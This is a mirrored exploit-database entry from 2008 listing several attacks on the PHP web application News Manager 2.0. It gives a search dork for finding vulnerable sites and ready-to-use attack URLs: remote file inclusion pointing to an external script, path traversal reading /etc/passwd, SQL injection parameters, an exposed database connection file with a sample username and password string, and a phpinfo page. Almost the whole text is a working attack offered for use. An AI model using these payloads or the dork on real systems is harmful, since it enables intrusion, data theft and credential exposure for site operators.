[] NeoSense
E X P L O I T S
title author type platform port cve id

newsmanager 2.0 - Remote File Inclusion / File Disclosure / SQL Injection

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2008-05-14 
date_updated: 2016-12-02 
verified: 1 
codes: OSVDB-45483;CVE-2008-2343;OSVDB-45482;CVE-2008-2342;OSVDB-45476;CVE-2008-2341;OSVDB-45475;OSVDB-45474;CVE-2008-2340;OSVDB-45473;OSVDB-45463;OSVDB-45461 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comnewsmanager2.0.zip
News Manager 2.0 Multiple Vulnerabilities
Script : http://superb-east.dl.sourceforge.net/sourceforge/newsrssmanager/newsmanager2.0.zip
Dork : "Copyrights © 2005 Belgische Federale Overheidsdiensten"
1- Remote File Include Vulnerability
/ch_readalso.php?read_xml_include=http://localhost/020.txt
2- Remote File Disclosure Vulnerability
/attachments.php?id=../../../../../../../../../../../../../etc/passwd
/login/attachments.php?id=
3- Remote SQL Injection Vulnerabilities
/list_tagitems.php?pid=-41[SQL]
/advsearch.php?lang='[SQL]
/archive.php?lang='[SQL]
/index.php?lang='[SQL]
4- Remote Permission Bypass Vulnerability
/db/connect_str.php
You Can Get Username Of db & Pass & Name .. As
mysql||localhost||newsmanager||root||mahmood4li
5- You Can Get PHPINFO From
/login/info.php
Thanx To : Tryag-Team & HaCkeR_EgY & InjEctOr5 TeaM & All Muslims HaCkeRs   :)

# milw0rm.com [2008-05-15]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.